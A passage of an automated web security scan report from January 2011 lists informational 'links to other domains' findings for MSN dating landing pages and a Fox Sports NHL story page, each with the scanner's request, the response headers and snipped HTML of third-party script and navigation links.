<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.237. http://msn.chemistry.com/cp/landing/44762

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/44762

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /cp/landing/44762?trackingid=516068&bannerid=2117632 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=037f54bf-c459-4cb1-bdf0-dea3bb4b0e7c; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Session=SID=429C52FF-5BAA-4D34-9E95-19BBC144E553&Th=10&TID=516068; path=/
Set-Cookie: UMID=0e49d04c-67dc-4d95-b16f-dca26b7d5ee9; expires=Sun, 29-Jan-2012 23:49:14 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>

<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
...[SNIP]...
<div id="reporting" style="display:none;"><img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=2558&amp;pi=7327&amp;ps=66851&amp;tp=http://specials.redacted/mopsdk/standard/dating/msnshell.aspx&amp;rf=" />
   <div id="omni">
...[SNIP]...
</script>
       
<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
</div>
   
<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://movies.msn.com/">Movies</a>
...[SNIP]...
<li><a href="http://music.msn.com/">Music</a>
...[SNIP]...
<li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/superfans/"> Superfans</a>
...[SNIP]...
<li><a href="http://tv.redacted/"> TV</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/"><strong>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li class="first"><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="logo"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
<strong><a href="http://dating.msn.com/msn/index.aspx?mmrd=1">Dating &amp; Personals</a></strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li class="last"><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="first"><a href="http://dating.msn.com/help/help.aspx?lid=413">Help</a></li><li><a href="http://feedback.msn.com/">Feedback</a></li><li class="last"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
</div>

   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.238. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /cp/landing/57269?trackingid=516068&bannerid=2117936 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=6f41ea2e-099d-4faf-baad-60917bfedb99; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Session=SID=4A15DA07-7D47-4FFA-9D6B-BFCCD012B62C&Th=10&TID=516068; path=/
Set-Cookie: UMID=7520ca2e-e5a7-4da6-a3c1-3ade5a050562; expires=Sun, 29-Jan-2012 23:49:08 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>

<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
...[SNIP]...
<div id="reporting" style="display:none;"><img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=2558&amp;pi=7327&amp;ps=66851&amp;tp=http://specials.redacted/mopsdk/standard/dating/msnshell.aspx&amp;rf=" />
   <div id="omni">
...[SNIP]...
</script>
       
<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
</div>
   
<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://movies.msn.com/">Movies</a>
...[SNIP]...
<li><a href="http://music.msn.com/">Music</a>
...[SNIP]...
<li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/superfans/"> Superfans</a>
...[SNIP]...
<li><a href="http://tv.redacted/"> TV</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/"><strong>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li class="first"><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="logo"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
<strong><a href="http://dating.msn.com/msn/index.aspx?mmrd=1">Dating &amp; Personals</a></strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li class="last"><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="first"><a href="http://dating.msn.com/help/help.aspx?lid=413">Help</a></li><li><a href="http://feedback.msn.com/">Feedback</a></li><li class="last"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
</div>

   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.239. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249503
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=20
Date: Sat, 29 Jan 2011 23:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://www.scenedaily.com/" target="_blank" title="Scene Daily">Scene Daily</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/nba-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/golf-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
